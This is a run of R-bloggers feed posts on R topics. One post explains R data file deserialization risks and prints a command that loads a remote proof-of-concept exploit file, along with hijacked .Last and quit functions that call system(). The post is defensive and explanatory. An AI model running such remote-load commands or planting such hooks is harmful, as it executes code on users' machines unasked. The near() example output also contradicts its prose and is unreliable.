projected_pop <- apply(revised_proj$PopM, 2, sum) + apply(revised_proj$PopF, 2, sum)

#-----------------Compare total population----------------
comp_data <- indicators |>
  filter(Location == revision_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `2022 UN projections` = TPopulation1Jan) |>
  mutate(`Revised with 2020 census` = as.numeric(projected_pop / 1000) )


p5 <- comp_data |>
  filter(Time <= 2050) |>
  gather(variable, value, -Time) |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = revision_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Population", x = "", colour = "")

#--------------Compare population pyramids-------------------------
d <- tibble(value = c( revised_proj$PopM[, 31], revised_proj$PopF[, 31],   
                  van_orig$un_proj$PopM[, 31],  van_orig$un_proj$PopF[, 31]),
       sex = rep(c("Male", "Female", "Male", "Female"), each = 121),
       model = rep(c("Revised projections with 2020 census, made in 2024", "UN projections, made in 2022"), each = 242),
       age = rep(0:120, 4)) |>
  mutate(agef = fct_reorder(as.character(age), age),
         model = fct_rev(model)) |>
  filter(age < 100)

d |>
  filter(sex == "Female") |>
  ggplot(aes(x = value, y = agef)) +
  facet_wrap(~model) +
  geom_col(fill = "brown", colour = NA) +
  geom_col(data = filter(d, sex == "Male"), aes(x = -value), fill = "orange", colour = NA) +
  geom_vline(xintercept = 0, colour = "white") +
  labs(x = "Number of people", y = "",
       title = "Comparison of UN original and revised population projections",
       subtitle = "Population age distribution in 2050") +
  scale_x_continuous(breaks = c(-4000, -2000, 0, 2000, 4000), labels = c("4,000", "Male", 0, "Female", "4,000")) +
  theme(panel.grid = element_blank()) +
  scale_y_discrete(breaks = 1:20 * 5)

And that’s what gets us these results:

I’m hoping this might be actually useful for pragmatic updates of the UN population projections when more current data is available, without having to revise everything from scratch.

OK, that’s all for today.

To leave a comment for the author, please follow the link and comment on their blog: free range statistics - R.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Reproducing and adapting the UN Population Projections by @ellis2013nz

Compare numeric vectors in R

R Archives » Data Science Tutorials — Sat, 04 May 2024 12:21:28 +0000

[This article was first published on R Archives » Data Science Tutorials, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

The post Compare numeric vectors in R appeared first on Data Science Tutorials

Unravel the Future: Dive Deep into the World of Data Science Today! Data Science Tutorials.

Compare numeric vectors in R, we explore the usage of the ‘near’ function from the ‘dplyr’ package in R programming.

The article is divided into two examples, with the first one demonstrating the basic application of the ‘near’ function and the second one showcasing its flexibility with user-defined tolerance.

Compare numeric vectors in R

To begin, we create exemplifying data by defining two numeric vectors, ‘x1’ and ‘x2’.

x1 <- 1:5                         
x2 <- c(1, 2.2, 2.5, 4, 5.3)

We then install and load the ‘dplyr’ package to access the ‘near’ function.

Time Series Trend Analysis in R »

library(dplyr)

Example 1: we apply the ‘near’ function to our vectors

The function returns a logical vector, indicating whether the corresponding elements from both vectors are the same.

In this case, the first and fourth elements are identical.

near(x1, x2)    
[1]  TRUE FALSE FALSE TRUE FALSE

Example 2: Baisis User-Defined Tolerance

In Example 2, we introduce the ‘tol’ argument, which allows for increased tolerance in the comparison.

near(x1, x2, tol = 0.2)   
[1]  TRUE FALSE FALSE TRUE FALSE

By setting the tolerance to 0.2, the second and third elements of the input vectors are now considered the same.

Adjusting the tolerance can be beneficial depending on specific requirements.

Summary

The ‘near’ function from the ‘dplyr’ package in R is a valuable tool for comparing numeric vectors and offers flexibility through the ‘tol’ argument.

The post Compare numeric vectors in R appeared first on Data Science Tutorials

Unlock Your Inner Data Genius: Explore, Learn, and Transform with Our Data Science Haven! Data Science Tutorials.

To leave a comment for the author, please follow the link and comment on their blog: R Archives » Data Science Tutorials.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Compare numeric vectors in R

Highlights from ShinyConf 2024

Appsilon — Sat, 04 May 2024 06:28:36 +0000

[This article was first published on Appsilon | Enterprise R Shiny Dashboards, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

ShinyConf 2024 was a resounding success!

We brought together the vibrant R/Shiny community for three days of insightful sessions, engaging workshops, and valuable networking opportunities. From seasoned developers to newcomers, the conference had something for everyone.

Insightful Sessions and Memorable Speakers

The sessions covered a wide range of topics, from best practices in Shiny development to innovative use cases across various industries, spanning four tracks: Innovation, Enterprise, Data 4 Good, and Life Sciences.

ShinyConf attendees gained valuable insights from industry experts. We had the opportunity to dive deep into specific areas of interest through hands-on workshops on modular app development (with Veerle van Leemput), PyShiny, Rhino, and Testing with Cypress.

‍

The speaker lineup was truly impressive, featuring renowned experts and thought leaders in R/Shiny who spoke on relevant and practical topics.

Tailoring Shiny for Modern Users by Lindsay Jorgenson & John Coene

‍

One notable session was by Joe Cheng, CTO of Posit, on Beyond Async: Intra-Session Concurrency in Shiny with ExtendedTask. During his talk, he introduced ExtendedTask, which allows you to run long-running tasks for a user while preserving both inter- and intra-session concurrency. Plus, he closed a six-year-old issue live.

Beyond Async: Intra-Session Concurrency in Shiny with ExtendedTask

‍Shinylive for R, which is new and about running Shiny apps in the browser, was also heavily discussed during the conference, especially during George Stagg’s keynote on reproducible data science and Barret Schloerke’s session on Shinylive.

Reproducible data science with webR and Shinylive

Insightful Keynotes

We had wonderful keynotes that covered thriving as an open source maintainer with Tracy K. Teal, the future of Shiny with Pedro Silva, webR and Shinylive with George Stagg, Shiny in Enterprise with Eric Kostello, and real-world use cases for AI in Shiny with Tanya Cashorali.

Beyond the Hype: Real-World Use Cases for AI in Shiny

*Replays of all the sessions are available on RingCentral.

New Open Source Package Announcement

One of the most exciting announcements at ShinyConf 2024 was the introduction of a new open-source package. This package promises to improve the way developers build and deploy enterprise Shiny applications. Details will be revealed soon! Watch our social media pages (LinkedIn & Twitter), join our community, and subscribe to our newsletter, Shiny Weekly, to learn more.

*‍*Update: Learn more about the package in our intro blog post, check it out on GitHub and here’s the documentation.

‍

Hex Logo Contest for Package Developers

Also, as part of Appsilon’s commitment to supporting the vibrant R package ecosystem, we’re hosting a Hex Logo Contest for developers who want unique hex designs for their packages. The contest is still on and closes on the 31st of May 2024. You can learn more and register on our website.

What Package R You? Quiz

In case you missed it, we added a fun element to the conference. Attendees had the opportunity to participate in our Ultimate R Package Personality Quiz. This interactive quiz matches you with an R package based on your personality and coding style. It’s still available, and you can try it out yourself.

‍

Redesign of Rhinoverse

Our Lab Lead, Jakub Nowicki, unveiled the redesign of the Rhinoverse hexes during the conference. We hope you love the fresh look of our open-source packages as much as we do!

‍

Rhinoverse

Conclusion

In conclusion, ShinyConf 2024 was a wonderful experience that brought together new and experienced R/Shiny professionals and thought leaders from several industries and research backgrounds.

‍

Here’s some feedback we’ve received from the community:

‍

“The event was incredibly informative and useful, and the perspectives about business use cases for shiny will be useful as some of us push for wider adoption.”

– ShinyConf 2024 Attendee

‍

“This was a great event! It was the first conference our Shiny R team has been to. I loved that it was virtual and the cost made it a no-brainer to my management. There was a good mix of speakers (some dev, some corporate, some scientist), which was cool.”

– ShinyConf 2024 Attendee

‍

To stay current on all things Shiny, follow us on social media, subscribe to Shiny Weekly, and join our community on Slack.

‍

We hope you had a great experience, and we look forward to seeing you at ShinyConf 2025!

‍

The post appeared first on appsilon.com/blog/.

To leave a comment for the author, please follow the link and comment on their blog: Appsilon | Enterprise R Shiny Dashboards.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Highlights from ShinyConf 2024

Things that can go wrong when using renv

Hugo Gruson — Sat, 04 May 2024 00:00:00 +0000

[social4i size="small" align="align-left"] -->

[This article was first published on Epiverse-TRACE developer space, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Throughout the Epiverse project, we use the renv R package to ensure reproducibility of the training materials and the pipelines we are providing. But we sometimes get reports from users who struggle to rebuild the environment and run the code.

In this post, we dissect the source of these issues, explain why in reality renv is not at fault, and how this is caused by the inherent complexity of reproducibility. The renv documentation already includes caveats explaining why some situations are bound to require more complex tools. This blog post reiterates some of these caveats and illustrates them with concrete examples.

Finally, we mention a couple of more complete (but more complex!) frameworks that can overcome the issues presented here. We do not explore these alternative framework in detail but provide links to more information.

Binaries vs building from source

Software, including R packages, can generally be delivered in two forms: as binaries or as source code. If you are building from the source code, you may in some case need a compilation toolchain on your computer. If that toolchain is missing, it can lead to errors such as:

ld: warning: search path '/opt/gfortran/lib' not found
ld: library 'gfortran' not found

Most of the time, regular users of R will not see these errors because they are installing binaries. Indeed, CRAN provides pre-compiled binaries for Windows and macOS for the last version of the package and R.

With renv, you often want to install older versions of the packages, which won’t be available as binaries from CRAN. This means you are more likely to have to compile the package yourself and see this kind of errors, even though renv is not causing them.

gfortran issues on Apple Silicon computers

If you are an Apple Silicon (Mac M1, M2, M3) user and encounter issues with gfortran, we have had success using the macrtools R package and we strongly recommend checking it out.

Beyond renv scope: incompatibility with system dependency versions

We discussed previously the topic of system dependencies, and dependencies on specific R versions. These special dependencies can also be a source of headaches when using renv.

The heart of the issue is that renv provides a simplified solution to reproducibility: it focuses on R packages and their versions. But other sources of non-reproducibility are outside its scope. In many cases, this will not be a problem, as the main source of non-reproducibility, especially in the relatively short-term, will be R package versions.

But sometimes, it is possible that the renv.lock lockfile requires such an old version of an R package that it was written with a syntax that is no longer supported by recent R versions or modern compilers.

For example, a recent project (from 2023) was trying to install the version 0.60.1 of the matrixStats package (from 2021). This lead to this compilation error:

error: ‘DOUBLE_XMAX’ undeclared (first use in this function); did you mean ‘DBL_MAX’?

Click to see the full error message

Expenditure-Based and Multivariate Weighted Indices: An R Package to Calculate CPI and Inflation

John Coker Ayimah — Fri, 03 May 2024 13:01:43 +0000

[This article was first published on R-posts.com, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Introduction

Hello everyone!
I’m excited to announce the release of our latest collaborative effort (R package), designed to make complex consumer price and inflation calculations a breeze: emWeightedCPI .
Here I will Introduce you to what this package is about.

What is emWeightedCPI?

Our R package “emWeightedCPI” (hosted on github) stands for Expenditure based and Multivariate Weighted Consumer Price Index. This is the result of the combined effort of myself and two other talented individuals; Dr Paul A. Agbodza and George K. Agyen . It is a versatile tool that simplifies the calculation of standard Consumer Price Indices (CPI) and Inflation using Expenditure based and Multivariate Weights. The package automates a proposed multivariate weighted indexing scheme for price data. More information can be found [here].

Why Create emWeightedCPI Package?

Normally CPI is calculated from household expenditure data obtained from household expenditure surveys. However, these surveys are expensive making it difficult to conduct on a regular basis. This package introduces an alternative weighting approach that enables the computation of variable weights using price data only.

This approach is convenient since it does not require incurring additional cost for conducting household expenditure survey to generate CPI for the determination of inflation figures. Even so, one can still generate the Laspeyres’ CPI and inflation using this package.

The workings of The package

Using emWeightedCPI is as easy as taking a stroll! Begin by installing the package from github by using

install.packages(“devtools”)

devtools::install_github(“JC-Ayimah/emWeightedCPI”)

Once installed, load the package into your R environment with library(emWeightedCPI) . Now you’re all set to dive into the world emWeightedCPI and make use of its functions

How does emWeightedCPI work?

The package contains four main functions:

mvw_cpi: This function calculates the multivariate weighted indices . It requires only one argument (data); a price dataset containing prices of various items for a base year and a current year. It then calculates four index values (CPI values) based on the data provided and returns them as a named vector
mvw_inflation: Using the index values calculated by mvw_cpi, the mvw_inflation function computes the inflation rate based on the selected index. The function takes two arguments index and data . the index argument takes one of four possible values (indexes); ‘fisher’, ‘paashe’,‘laspeyres’ and ‘drobish’. The data argument requires the price dataset from which the inflation is to be determined.
eb_cpi: This function calculates consumer price indexI from expenditure based expenses. The function takes in two inputs, a price data and an expenditure data. The index calculated from this function is the ‘Laspeyres index’
eb_inflation: Like the mvw_inflation function, the eb_inflation function also calculates inflation based on the index calculated from the eb_cpi function. The function takes the same arguments specified in the eb_cpi function.

Usage Examples

Lets create a price data containing the prices of 4 different items for a base year and current year.

#create an arbitrary price data

mypriceData <- data.frame(x1=runif(50, 9.9, 13.7), x2=rnorm(50, 10.9, 2.1), x3=runif(50, 12.2, 15), x4=runif(50,19.4, 24), # base year prices y1=runif(50, 26, 30), y2=runif(50, 31, 38.9), y3=runif(50, 28.2, 33.1), y4=runif(50, 51.8, 60)# current year prices )

To calculate the multivariate weighted indices simply use;

library(emWeightedCPI)

indices <- mvw_cpi(data = mypriceData)

indices

To calculate the multivariate weighted inflation based on a specific index (let’s say ‘fishers’) we use;

inflation_value <- mvw_inflation(index = ‘fisher’, data = mypriceData) inflation_value

The expenditure based index eb_cpi and inflation eb_inflation can also be calculated easily by using the codes as shown below. We need to generate an expenditure data to use together with our previously created price data in order to calculate the expenditure based index and inflation.

#pick the average base year prices from mypriceData

n_vec <- apply(mypriceData[, 1:4], 2, mean)

n_vec

#combine the output above into a dataframe with two columns and same

#number of rows as number of price items to create expenditure data

myexpData <- cbind.data.frame(item = names(n_vec), price = (unname(n_vec)))

myexpData

#calculate expenditure based CPI

exp_index <- eb_cpi(price_data = mypriceData, expenditure_data = myexpData)

exp_index

#calculate expenditure based Inflation

exp_inflation <- eb_inflation(mypriceData, myexpData)

exp_inflation

Conclusion

Innovation often thrives when minds come together, and emWeightedCPI is a testament to the power of collaboration. We’re incredibly proud of what we’ve achieved with this package, and we hope it becomes a valuable asset in your analytical toolkit.

Why Use emWeightedCPI?

Ease of Use: The functions in emWeightedCPI are designed to be intuitive and straightforward to use.
Flexibility: Users can customize the calculations based on their specific requirements by adjusting the input parameters especially for the mvw_inflation function
Efficiency: With optimized algorithms, emWeightedCPI delivers fast and accurate results.

Get Started with emWeightedCPI Today!

If you’re looking to simplify your consumer price index and inflation rate calculations in R, give emWeightedCPI a try! You can install it directly from github using:

install.packages(“devtools”)devtools::install_github(“JC-Ayimah/emWeightedCPI”)

For more information and detailed documentation, check out the emWeightedCPI GitHub repository.

We hope you find emWeightedCPI as useful and exciting as we do! Feel free to reach out with any questions, feedback, or suggestions.

Happy calculating!

Expenditure-Based and Multivariate Weighted Indices: An R Package to Calculate CPI and Inflation was first posted on May 3, 2024 at 1:01 pm.

To leave a comment for the author, please follow the link and comment on their blog: R-posts.com.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Expenditure-Based and Multivariate Weighted Indices: An R Package to Calculate CPI and Inflation

CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0

hrbrmstr — Fri, 03 May 2024 10:12:52 +0000

[This article was first published on R Archives - rud.is, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print that’s going to be in your global environment and get called when print() gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.

A tad more insidious is what happens when you quit R. By default, on quit(), unless you specify otherwise, that function invocation will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which will also get called by default when the objects are being destroyed on quit.

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

-----------------------------------------------
Loading R data file in quarantined environment…
-----------------------------------------------

Loading objects:
  .Last
  quit

-----------------------------------------
Enumerating objects in loaded R data file
-----------------------------------------

.Last : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile'  
quit : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile'  

------------------------------------
Functions found: enumerating sources
------------------------------------

Checking `.Last`…

!! `.Last` may execute arbitrary code on your system under certain conditions !!

`.Last` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}


Checking `quit`…

!! `quit` may execute arbitrary code on your system under certain conditions !!

`quit` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.

The post CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 appeared first on rud.is.

To leave a comment for the author, please follow the link and comment on their blog: R Archives - rud.is.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0

Notes on Citing R and R Packages

Higher Order Functions — Fri, 03 May 2024 05:00:00 +0000

[This article was first published on Higher Order Functions, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Our group has started using a new knowledge base system, so I have been writing up and revisiting some of my documentation. Here I am going to share a guide I wrote about citing R packages in academic writing.

Which software to cite

Let’s make a distinction here between reporting (or summarizing) an analysis and reproducing (or carrying out) an analysis.

Our main manuscript document is for reporting. We want to report which tools and which versions of those tools we used to get our statistical results. We don’t need to include every computational detail. We will save that level of detail for a supplemental document that shows the exact modeling code and sessioninfo::session_info() for reproducing our results. Moreover, journals will sometimes limit the number of references in a manuscript and a full R analysis might draw on 15 packages, so we in general cannot cite everything that helped us get our results. So, we can think more generally about citation priorities.

For an analysis carried out in R, we need to cite and version:

R (the programming language / analysis environment).
Third party packages that carried out the analyses.
- For example, nlme, lme4, ordinal, rms, brms.
If a package calls on another language or analysis tool, cite that tool as well.
- For example, brms and rstanarm fit models using the Stan programming language, so we need to cite and version Stan as well.
Packages that performed additional computation on analysis results.
- For example, emmeans to get marginal means from a fitted model.
Packages that visualized analysis results automatically. For example, see or interactions.

The following items would have the lowest priority for citations:

RStudio: It’s just an interface to the language. (Ideally, an analysis could be run without touching RStudio.)
The built-in stats package.
knitr/quarto/rmarkdown: These performed R computations for us and stored the results in a document.
Siloed off parts of a main package.
- For example, the gamlss package fits GAMLSS models but the distributions for model families are stored in the package gamlss.dist. gamlss needs gamlss.dist to work, but gamlss is the main important thing to cite.
Data storage formats.

If space and the publication venue permit, we can also cite and version the key R packages that manipulated or visualized the data such as tidyverse, ggplot2, broom, tidybayes/ggdist, etc. Be generous. We do want to credit the tools we used to get our results after all!

Where to get citation information

Creators of scientific software will often tell users how to cite their software. Scientific software tools often have an associated article that announces the software and describes how to use it, so authors will ask users to cite that publication so they can obtain academic credit for their software work.

For R and R packages, the citation() function will tell users how to cite their software. lme4 is one of those packages that directs users to a publication.

citation("lme4")
#> To cite lme4 in publications use:
#> 
#>   Douglas Bates, Martin Maechler, Ben Bolker, Steve Walker (2015).
#>   Fitting Linear Mixed-Effects Models Using lme4. Journal of
#>   Statistical Software, 67(1), 1-48. doi:10.18637/jss.v067.i01.
#> 
#> A BibTeX entry for LaTeX users is
#> 
#>   @Article{,
#>     title = {Fitting Linear Mixed-Effects Models Using {lme4}},
#>     author = {Douglas Bates and Martin M{\"a}chler and Ben Bolker and Steve Walker},
#>     journal = {Journal of Statistical Software},
#>     year = {2015},
#>     volume = {67},
#>     number = {1},
#>     pages = {1--48},
#>     doi = {10.18637/jss.v067.i01},
#>   }

Notice in the BibTeX entry at the bottom how {lme4} is put in braces. These braces tell LaTeX not to change the capitalization of that word when printing the title. Some journals or formats have different preferences for how to capitalize titles, but as a general rule of thumb, software titles need to be printed verbatim, or as they would be used by the user. (library(Lme4) will not load the lme4 package). When creating bibliography entries, take care to follow the capitalization so that the software name is accurate. Take care also to differentiate between statistical methods and software names: “We fit GAMLSS models with the gamlss package”.

For CRAN packages, the output of citation() is also provided online in HTML. The CRAN package description page (e.g., lme4) includes a Citation entry which generates a formatted version of the citation information (e.g., lme4 citation info).

When the software doesn’t have a publication, R will generate a citation for you. The ordinal package is one such example.

citation("ordinal")
#> To cite 'ordinal' in publications use:
#> 
#>   Christensen R (2023). _ordinal-Regression Models for Ordinal Data_. R
#>   package version 2023.12-4,
#>   .
#> 
#> A BibTeX entry for LaTeX users is
#> 
#>   @Manual{,
#>     title = {ordinal---Regression Models for Ordinal Data},
#>     author = {Rune H. B. Christensen},
#>     year = {2023},
#>     note = {R package version 2023.12-4},
#>     url = {https://CRAN.R-project.org/package=ordinal},
#>   }

The underscores _ in the title indicate that the title would be italicized when the citation is viewed on CRAN.

How to cite and version R and R packages

As a rule of thumb, any citation of any resource should answer these questions:

Who (authors)
What (title and sometimes format)
When (year)
Where (journal, URL, book, DOI)

Then for software, we can add the following:

Which (version)

The citation() will answer these questions for you.

There are a couple of other functions to know when it comes to package versions. utils::packageVersion() provides the package version as a string:

utils::packageVersion("lme4")
#> [1] '1.1.35.3'
utils::packageVersion("ordinal")
#> [1] '2023.12.4'

For the current R version, a bunch of built-in functions can tell you everything you need to know. I can never remember which of these functions I want (it’s getRversion()), so I will sometimes use utils::packageVersion("base") to get a simple version number.

R.version.string
#> [1] "R version 4.3.3 (2024-02-29 ucrt)"
R.version
#>                _                                
#> platform       x86_64-w64-mingw32               
#> arch           x86_64                           
#> os             mingw32                          
#> crt            ucrt                             
#> system         x86_64, mingw32                  
#> status                                          
#> major          4                                
#> minor          3.3                              
#> year           2024                             
#> month          02                               
#> day            29                               
#> svn rev        86002                            
#> language       R                                
#> version.string R version 4.3.3 (2024-02-29 ucrt)
#> nickname       Angel Food Cake
getRversion()
#> [1] '4.3.3'

utils::packageVersion("base")
#> [1] '4.3.3'

For Stan, depending on the backend used, the software version is available via:

# rstanarm and default brms
rstan::stan_version()
#> [1] "2.32.2"

# non-default for brms
cmdstanr::cmdstan_version()
#> [1] "2.34.1"

Examples

A simple example of R, a modeling R package and a helper R package:

Analyses were carried out the R programming language (vers. 4.2.0, R Core Team, 2021). Mixed models were estimated using the lme4 package (vers. 1.1.28, Bates et al., 2015). We estimated marginal means and contrasts using the emmeans package (vers. 1.7.2, Lenth, 2021).

Below is the actual RMarkdown content, so that version numbers and citations are inlined automatically. (We’re omitting details on creating .bib files or using pandoc’s @ citations.)

```{r}
v_lme4 <- packageVersion("lme4")
v_r <- packageVersion("base")
v_emmeans <- packageVersion("emmeans")
```

Analyses were carried out the R programming language [vers. `r v_r`,
@rstats]. Mixed models were estimated using the lme4 package
[vers. `r v_lme4`, @lme4]. We estimated marginal means and contrasts
using the emmeans package [vers. `r v_emmeans`, @emmeans].

Here is a more involved example involving an additional language and an R package that interfaces to that language:

We estimated the models using Stan (vers. 2.27.0, Carpenter et al., 2017) via the brms package (vers. 2.16.1, Bürkner, 2017) and tidybayes package (vers. 3.0.4, Kay, 2021) in R (vers. 4.3.0, R Core Team, 2021).

Behind the scenes, I had written the following RMarkdown:

```{r}
model <- targets::tar_read(model_random_slope)
v_stan <- model$version$cmdstan
v_brms <- model$version$brms
v_tidybayes <- packageVersion("tidybayes")
v_r <- getRversion()
```

We estimated the models using Stan [vers. `r v_stan`, @stan] via the
brms package [vers. `r v_brms`, @brms-jss] and tidybayes package
[vers. `r v_tidybayes`, @R-tidybayes] in R [vers. `r v_r`, @r-base].

Notice that I am reading in a cached model object (targets::tar_read()) and reading the software versions from that object. This arrangement avoids problems where models are fitted with one version of a package but utils::packageVersion() returns a different, more recent package version. brms stored these versions automatically for me. In general, when I cache a model like this, I store the package version in the model object.

Last knitted on 2024-05-03. Source code on GitHub.¹

.session_info
#> ─ Session info ───────────────────────────────────────────────────────────────
#>  setting         value
#>  version         R version 4.3.3 (2024-02-29 ucrt)
#>  os              Windows 11 x64 (build 22631)
#>  system          x86_64, mingw32
#>  ui              RTerm
#>  language        (EN)
#>  collate         English_United States.utf8
#>  ctype           English_United States.utf8
#>  tz              America/Chicago
#>  date            2024-05-03
#>  pandoc          NA
#>  stan (rstan)    2.32.2
#>  stan (cmdstanr) 2.34.1
#> 
#> ─ Packages ───────────────────────────────────────────────────────────────────
#>  ! package        * version  date (UTC) lib source
#>    abind            1.4-5    2016-07-21 [1] CRAN (R 4.3.0)
#>    backports        1.4.1    2021-12-13 [1] CRAN (R 4.3.0)
#>    cachem           1.0.8    2023-05-01 [1] CRAN (R 4.3.0)
#>    checkmate        2.3.1    2023-12-04 [1] CRAN (R 4.3.3)
#>    cli              3.6.2    2023-12-11 [1] CRAN (R 4.3.3)
#>    cmdstanr         0.7.1    2024-03-29 [1] local
#>    codetools        0.2-19   2023-02-01 [2] CRAN (R 4.3.3)
#>    colorspace       2.1-0    2023-01-23 [1] CRAN (R 4.3.0)
#>    curl             5.2.1    2024-03-01 [1] CRAN (R 4.3.3)
#>    distributional   0.4.0    2024-02-07 [1] CRAN (R 4.3.3)
#>    downlit          0.4.3    2023-06-29 [1] CRAN (R 4.3.2)
#>    dplyr          * 1.1.4    2023-11-17 [1] CRAN (R 4.3.2)
#>    evaluate         0.23     2023-11-01 [1] CRAN (R 4.3.2)
#>    fansi            1.0.6    2023-12-08 [1] CRAN (R 4.3.3)
#>    fastmap          1.1.1    2023-02-24 [1] CRAN (R 4.3.0)
#>    forcats        * 1.0.0    2023-01-29 [1] CRAN (R 4.3.0)
#>    generics         0.1.3    2022-07-05 [1] CRAN (R 4.3.0)
#>    ggplot2        * 3.5.1    2024-04-23 [1] CRAN (R 4.3.3)
#>    git2r            0.33.0   2023-11-26 [1] CRAN (R 4.3.2)
#>    glue             1.7.0    2024-01-09 [1] CRAN (R 4.3.3)
#>    gridExtra        2.3      2017-09-09 [1] CRAN (R 4.3.0)
#>    gtable           0.3.5    2024-04-22 [1] CRAN (R 4.3.3)
#>    here             1.0.1    2020-12-13 [1] CRAN (R 4.3.0)
#>    hms              1.1.3    2023-03-21 [1] CRAN (R 4.3.0)
#>    inline           0.3.19   2021-05-31 [1] CRAN (R 4.3.0)
#>    jsonlite         1.8.8    2023-12-04 [1] CRAN (R 4.3.3)
#>    knitr          * 1.46     2024-04-06 [1] CRAN (R 4.3.3)
#>    lifecycle        1.0.4    2023-11-07 [1] CRAN (R 4.3.2)
#>    loo              2.7.0    2024-02-24 [1] CRAN (R 4.3.3)
#>    lubridate      * 1.9.3    2023-09-27 [1] CRAN (R 4.3.1)
#>    magrittr         2.0.3    2022-03-30 [1] CRAN (R 4.3.0)
#>    matrixStats      1.3.0    2024-04-11 [1] CRAN (R 4.3.3)
#>    memoise          2.0.1    2021-11-26 [1] CRAN (R 4.3.0)
#>    munsell          0.5.1    2024-04-01 [1] CRAN (R 4.3.3)
#>    pillar           1.9.0    2023-03-22 [1] CRAN (R 4.3.0)
#>    pkgbuild         1.4.4    2024-03-17 [1] CRAN (R 4.3.3)
#>    pkgconfig        2.0.3    2019-09-22 [1] CRAN (R 4.3.0)
#>    posterior        1.5.0    2023-10-31 [1] CRAN (R 4.3.2)
#>    processx         3.8.4    2024-03-16 [1] CRAN (R 4.3.3)
#>    ps               1.7.6    2024-01-18 [1] CRAN (R 4.3.3)
#>    purrr          * 1.0.2    2023-08-10 [1] CRAN (R 4.3.1)
#>    QuickJSR         1.1.3    2024-01-31 [1] CRAN (R 4.3.3)
#>    R6               2.5.1    2021-08-19 [1] CRAN (R 4.3.0)
#>    ragg             1.3.0    2024-03-13 [1] CRAN (R 4.3.3)
#>    Rcpp             1.0.12   2024-01-09 [1] CRAN (R 4.3.3)
